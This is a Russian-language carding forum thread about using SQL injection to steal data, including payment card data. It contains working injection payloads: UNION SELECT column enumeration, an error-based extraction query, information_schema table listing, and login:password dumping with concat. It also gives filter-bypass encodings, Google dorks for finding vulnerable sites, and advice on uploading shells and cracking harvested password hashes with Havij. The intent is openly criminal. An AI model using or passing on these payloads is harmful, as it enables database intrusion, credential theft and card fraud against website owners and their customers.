Видео: SQL - инъекция, добыча картона.
- Thread starter Passion
- Start date
Назрел такой вопрос.......
Допустим ссыль xxx.sitename/view_details.php?ID=1409+order+by+7--
выдает ошибку - типо значений меньше
xxx.sitename/view_details.php?ID=1409+order+by+6--
ошибка исчезает,
но при вводе
xxx.sitename/view_details.php?ID=1409+union+select+1,2,3,4,5,6--
выдается сообщение The used SELECT statements have a different number of columns
В чем может быть загвоздка?
Инфа о ресурсе Web Server: Apache/2
Powered-by: PHP/4.4.9
Injection type is Integer
DB Server: MySQL >=5
Допустим ссыль xxx.sitename/view_details.php?ID=1409+order+by+7--
выдает ошибку - типо значений меньше
xxx.sitename/view_details.php?ID=1409+order+by+6--
ошибка исчезает,
но при вводе
xxx.sitename/view_details.php?ID=1409+union+select+1,2,3,4,5,6--
выдается сообщение The used SELECT statements have a different number of columns
В чем может быть загвоздка?
Инфа о ресурсе Web Server: Apache/2
Powered-by: PHP/4.4.9
Injection type is Integer
DB Server: MySQL >=5
Last edited:
много вариантов, скинь полную ошибку при подставлении кавычки
и попробуй так +or+1=(select+1+from(select+count(*),concat((select+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND vendors.ID = products.vendor LIMIT 0, 10' at line 1
хороший совет,особенно если учесть что я в этом топе о нем уже писал....Неплохо бы глазами пробегать топ прежде чем высказывать мнение.
По havij - инструмент неплохой,но бывает что незатертые строки не читает.Обычнно использую в комплексе и руки и софт.
ссыль из первого поста нормально качается.....
чего то да стоят..Думаю от стран зависит
Что за прога? Google не знает такой проги......
helixtwins
VIP member
извиняюсь за тупой вопрос. что такое шелл, который можно залить, чтобы получить бд? ну хотя бы вкратце, чтобы понять, куда копать...
пысы. лучше конечно поподробнее, как колхозу. на пальцах... ну пожалуйста...
пысы. лучше конечно поподробнее, как колхозу. на пальцах... ну пожалуйста...
шелл это скрипт через который можешь входить в БД сайта в обход админки. Чтоб залить шелл, нужно сначало поиметь доступ к БД, взломать сайт и забрать логин;пасс от админки и через админку войти в БД и залить шелл.
Я как бы тоже не профи в этом, сам только разбираюсь, если что напутал профи поправит, но вроде все так.
А как залит шелл и т.д. это на ачате поищи, там много инфы. Вобщем сначало надо ломануть сайт, потом все остальное.
Вот если ещё поможет нашел для вас..
SQL - INJECTION FAQ
В последнее время зачастились вопросы ко мне в ICQ - как провести SQL - Injection. Какие команды, почему неполучается... И я решил сделать FAQ... который будет дополнятся постоянно...
1. Q. КАК НАЙТИ SQL INJECTION
A. В конце параметра ID или PID поставить одинарную кавычку... Увидите ошибку типо
code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/Program_Areas/project.asp, line 146
или
code:
[Microsoft][ODBC Microsoft Access Driver]
или
code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.lionheart/ecodelaware/ecodelaware.com/place.php on line 107
Это скорее всего SQL - injecton зависит от СУБД...
2. Q. Как определить количество таблиц???
A. Для этого после цифры которая следует после ID ввести команду
code:
order+by+10/*
Если вылазиет ошибка таблиц меньше 10 если все нормально то больше... Увеличивать по 1 до появления ошибки... Это и будет точное кол во таблиц...
3. Q. Я нашол точное количество таблиц и ХЗ чеделать дальше...
А. Дальше выводим рабочую цифру (тоблицу), предположем таблиц 5, делаем запрос
code:
+union+select+1,2,3,4,5/*
мы увидим цыфру с которой будем работать...
4. Q. Как определить версию СУБД?
А. Команда
code:
version(),database(),user()
5. Q.У меня mysql 4 версии немогу вывести названия таблиц???
A. Ты их и невывидиш потомучто функция information_schema.tables отключенна...
Перебирай в слепую...
6. Q. А как посмотреть название всех таблиц???
А. В 5 ветки командой
code:
information_schema.tables
пример +union+select+1,table_name,3,4,5+from+information_schema.tables/*
7. Q. А как узнать названия столбцов???
А. Так же как и таблиц заменяем на Column_name и information_schema.columns
8. Q. Я узнал таблицу USERS и столбцы login и password как мне вывести результат???
A. Командой
code:
union+select+1,concat(login,0x3a,password),3,4,5--
9. Q. Я узнал пароль и имя администратора, а где админка???
A. Ебу я чтоли где админки, я сайт делал чтоли!!!
10. Q. А где можно посмотреть видеомануалы по этой теме???
А. Вот ТУТ
11. Q. Я узнал количество таблиц на когда ввожу UNION+SELECT ничего непроисходит или вылазиет ошибка..??
А. Это потому что это функция отключенна - это blind SQL - injection
12. Q. А как мне отыскать SQL СУБД при помощи google??
А ТАКИЕ ЗАПРОСЫ
code:
inurl:".php?id="
- в основном mySQL ,
code:
inurl:".asp?id="
- mssql
13. Q. А как мне обойти фильтрацию переменных???
А. В конце вместо ' можно ставить ",`,%27,%2527
Вместо /* можно --,{,%23
Вместо + можно /**/,%09,%0a,%0d,%2b
14. Q. Почему при команде group_concat не все таблицы или столбцы выводятся на экран??
А. Потомучто скорее всего стоит ограничение на вывод символов, перебираем через +Limit+1,1
15. Q. Чем отличается mssql от mysql?
А. MSSQL вертится на винде, а mySQL на чем угодно...
__________________
Или вот почитай что не ясно то.
https://rdot.org/forum/showthread.php?t=245
Last edited:
helixtwins
VIP member
И еще вопрос. По поводу расшифровки. Сканер havij норм расшифровывает? я тут намыл некое количество паролей-кракозюлек типа админских, они не работают после расшифровки.
вариант с кривыми руками и прямыми извилинами я рассматриваю, конечно, но не сразу)
вариант с кривыми руками и прямыми извилинами я рассматриваю, конечно, но не сразу)
Last edited:
Хэш не поддается расшифровке. Только подбор. В данной софтине (если Вы используете MD5) идет коннект к базам разлмчных ресурсов, где и хранятся подобранные уже хеши. Если пасс не сложный, ассоциативный или не соленый (не используются посторонние данные для щифрования), то вероятность подбора - велика.
В Вашем случае, если Вы получили хэш МД5 и арабская софтина подобрала, то (по своему опыту под виндой им часто пользуюсь - если пасс подобран) 99%, что у Вас есть настоящий пасс.
Но иногда "работая" с самописными движками, я получаю хеш, потом пасс, затем не подходит - ответ один (не та таблица или база). Бывает, что заботливые разработчики делают фейковые
базы.
Similar threads
